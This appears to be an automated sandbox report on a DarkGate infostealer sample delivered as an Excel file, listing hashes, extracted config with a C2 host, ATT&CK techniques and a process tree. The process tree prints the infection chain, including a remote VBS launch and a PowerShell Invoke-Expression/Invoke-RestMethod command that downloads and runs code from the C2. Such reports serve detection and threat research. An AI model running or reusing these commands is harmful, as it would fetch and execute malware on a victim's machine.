darkgate | c788865f66a500b7555f78979d2874f066de21384d0fef3707785a450cd8df0e

General

Target

c788865f66a500b7555f78979d2874f066de21384d0fef3707785a450cd8df0e.xlsx
Size

56KB
MD5

950c7daa701f5f4bbb3fc72ce1d003f0
SHA1

396be2776d4625b386a3ff4dcce8d840e1e2e3de
SHA256

c788865f66a500b7555f78979d2874f066de21384d0fef3707785a450cd8df0e
SHA512

9d192f5a701cb81fb2e0f7054a82e1629ff6b832066277dfe108a940b39f680deba2e1ffbb49b77468b2d5a534650aa68107a0376efd9851bfddf484204a445d
SSDEEP

768:ZFSadDlT2qpaOKFSGOJdGvoZCPAUJ1YxBardD2TSWGdCIKD15ogXnlq51s5:LZ2u4OPKIxoEuDKJnlqs5

Score

10^/10

darkgate admin888 stealer

Malware Config

Extracted

Family

darkgate

Botnet

admin888

C2

irreceiver.com

Attributes

anti_analysis
true
anti_debug
false
anti_vm
true
c2_port
80
check_disk
false
check_ram
false
check_xeon
false
crypter_au3
false
crypter_dll
false
crypter_raw_stub
false
internal_mutex
zvRxAJTe
minimum_disk
100
minimum_ram
4096
ping_interval
6
rootkit
false
startup_persistence
true
username
admin888

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate

Detect DarkGate stealer 2 IoCs

resource	yara_rule
behavioral2/memory/2708-69-0x0000000004AD0000-0x0000000004B44000-memory.dmp	family_darkgate_v6
behavioral2/memory/2708-71-0x0000000004AD0000-0x0000000004B44000-memory.dmp	family_darkgate_v6

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4092	1456	WScript.exe	84

Blocklisted process makes network request 4 IoCs

flow	pid	Process
33	2128	powershell.exe
34	2128	powershell.exe
39	2128	powershell.exe
43	2128	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
2708	AutoHotkey.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoHotkey.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoHotkey.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1456	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2128	powershell.exe
2128	powershell.exe
2708	AutoHotkey.exe
2708	AutoHotkey.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2128	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1456	EXCEL.EXE
1456	EXCEL.EXE

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
1456	EXCEL.EXE
1456	EXCEL.EXE
1456	EXCEL.EXE
1456	EXCEL.EXE
1456	EXCEL.EXE
1456	EXCEL.EXE
1456	EXCEL.EXE
1456	EXCEL.EXE
1456	EXCEL.EXE
1456	EXCEL.EXE
1456	EXCEL.EXE
1456	EXCEL.EXE

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 1456 wrote to memory of 4092	1456	EXCEL.EXE	94
PID 1456 wrote to memory of 4092	1456	EXCEL.EXE	94
PID 4092 wrote to memory of 2128	4092	WScript.exe	96
PID 4092 wrote to memory of 2128	4092	WScript.exe	96
PID 2128 wrote to memory of 2708	2128	powershell.exe	100
PID 2128 wrote to memory of 2708	2128	powershell.exe	100
PID 2128 wrote to memory of 2708	2128	powershell.exe	100
PID 2128 wrote to memory of 660	2128	powershell.exe	101
PID 2128 wrote to memory of 660	2128	powershell.exe	101

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
660	attrib.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\c788865f66a500b7555f78979d2874f066de21384d0fef3707785a450cd8df0e.xlsx"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1456
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "\\86.104.72.124\prv\MS_EXCEL_ATTACHMENT_04.03.24.vbs"
  2⤵
  - Process spawned unexpected child process
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4092
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'irreceiver.com/abtjvwag')
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2128
  - - C:\unuu\AutoHotkey.exe
      "C:\unuu\AutoHotkey.exe" C:/unuu/script.ahk
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:2708
  - - C:\Windows\system32\attrib.exe
      "C:\Windows\system32\attrib.exe" +h C:/unuu/
      4⤵
      Views/modifies file attributes
      PID:660

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

1

T1564

Hidden Files and Directories

1

T1564.001

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

4

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hiniwtk0.t4c.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\unuu\AutoHotkey.exe

Filesize
892KB

MD5
a59a2d3e5dda7aca6ec879263aa42fd3

SHA1
312d496ec90eb30d5319307d47bfef602b6b8c6c

SHA256
897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb

SHA512
852972ca4d7f9141ea56d3498388c61610492d36ea7d7af1b36d192d7e04dd6d9bc5830e0dcb0a5f8f55350d4d8aaac2869477686b03f998affbac6321a22030

Download Submit
C:\unuu\script.ahk

Filesize
55KB

MD5
19e75786679b00522fea35c69a0c0fce

SHA1
ccffd3dbfb48e4ec7b1573b98397c2ec7732209d

SHA256
dcce467f4267254a1dfd26642008811970edff2d8e6383fba9ac7b09e3e787a8

SHA512
d75c91a917bb7a7cad4e1b4e6cd8e6a74a370bc9bd32970e8893ab8a61c06c8b6e6a851398df71b122013c85aec305b6cf7060f8a3a288f3994d67a303cda381

Download Submit
C:\unuu\test.txt

Filesize
925KB

MD5
d8b73462333bdb849072b7aac8d50a26

SHA1
f6c18da478921fc09c3ebe16bf7209d8757bd76b

SHA256
ba678d79ce2ddfe428b5ca83640e4eb0be5592da97228f5f5013b87e51f51e6c

SHA512
7d3bb60ff730c610c9355ed350777aeb28520676378e0010b8bb44d171e8d3d81aeca46bf89f5e001a06e2e85567a429fb53d583865831aa56dbf40bb517c9f2

Download Submit
memory/1456-16-0x00007FF9AE7D0000-0x00007FF9AE7E0000-memory.dmp

Filesize
64KB

Download
memory/1456-17-0x00007FF9F0A10000-0x00007FF9F0C05000-memory.dmp

Filesize
2.0MB

Download
memory/1456-5-0x00007FF9B0A90000-0x00007FF9B0AA0000-memory.dmp

Filesize
64KB

Download
memory/1456-7-0x00007FF9F0A10000-0x00007FF9F0C05000-memory.dmp

Filesize
2.0MB

Download
memory/1456-8-0x00007FF9F0A10000-0x00007FF9F0C05000-memory.dmp

Filesize
2.0MB

Download
memory/1456-9-0x00007FF9F0A10000-0x00007FF9F0C05000-memory.dmp

Filesize
2.0MB

Download
memory/1456-12-0x00007FF9AE7D0000-0x00007FF9AE7E0000-memory.dmp

Filesize
64KB

Download
memory/1456-10-0x00007FF9F0A10000-0x00007FF9F0C05000-memory.dmp

Filesize
2.0MB

Download
memory/1456-11-0x00007FF9F0A10000-0x00007FF9F0C05000-memory.dmp

Filesize
2.0MB

Download
memory/1456-13-0x00007FF9F0A10000-0x00007FF9F0C05000-memory.dmp

Filesize
2.0MB

Download
memory/1456-14-0x00007FF9F0A10000-0x00007FF9F0C05000-memory.dmp

Filesize
2.0MB

Download
memory/1456-15-0x00007FF9F0A10000-0x00007FF9F0C05000-memory.dmp

Filesize
2.0MB

Download
memory/1456-0-0x00007FF9B0A90000-0x00007FF9B0AA0000-memory.dmp

Filesize
64KB

Download
memory/1456-18-0x00007FF9F0A10000-0x00007FF9F0C05000-memory.dmp

Filesize
2.0MB

Download
memory/1456-19-0x00007FF9F0A10000-0x00007FF9F0C05000-memory.dmp

Filesize
2.0MB

Download
memory/1456-6-0x00007FF9B0A90000-0x00007FF9B0AA0000-memory.dmp

Filesize
64KB

Download
memory/1456-4-0x00007FF9F0A10000-0x00007FF9F0C05000-memory.dmp

Filesize
2.0MB

Download
memory/1456-1-0x00007FF9F0A10000-0x00007FF9F0C05000-memory.dmp

Filesize
2.0MB

Download
memory/1456-3-0x00007FF9B0A90000-0x00007FF9B0AA0000-memory.dmp

Filesize
64KB

Download
memory/1456-66-0x00007FF9F0A10000-0x00007FF9F0C05000-memory.dmp

Filesize
2.0MB

Download
memory/1456-62-0x00007FF9F0A10000-0x00007FF9F0C05000-memory.dmp

Filesize
2.0MB

Download
memory/1456-2-0x00007FF9B0A90000-0x00007FF9B0AA0000-memory.dmp

Filesize
64KB

Download
memory/1456-51-0x00007FF9F0A10000-0x00007FF9F0C05000-memory.dmp

Filesize
2.0MB

Download
memory/2128-43-0x000001DD71CF0000-0x000001DD71EB2000-memory.dmp

Filesize
1.8MB

Download
memory/2128-41-0x000001DD71570000-0x000001DD71580000-memory.dmp

Filesize
64KB

Download
memory/2128-65-0x00007FF9C76F0000-0x00007FF9C81B1000-memory.dmp

Filesize
10.8MB

Download
memory/2128-42-0x000001DD71570000-0x000001DD71580000-memory.dmp

Filesize
64KB

Download
memory/2128-40-0x00007FF9C76F0000-0x00007FF9C81B1000-memory.dmp

Filesize
10.8MB

Download
memory/2128-39-0x000001DD71720000-0x000001DD71742000-memory.dmp

Filesize
136KB

Download
memory/2708-69-0x0000000004AD0000-0x0000000004B44000-memory.dmp

Filesize
464KB

Download
memory/2708-71-0x0000000004AD0000-0x0000000004B44000-memory.dmp

Filesize
464KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads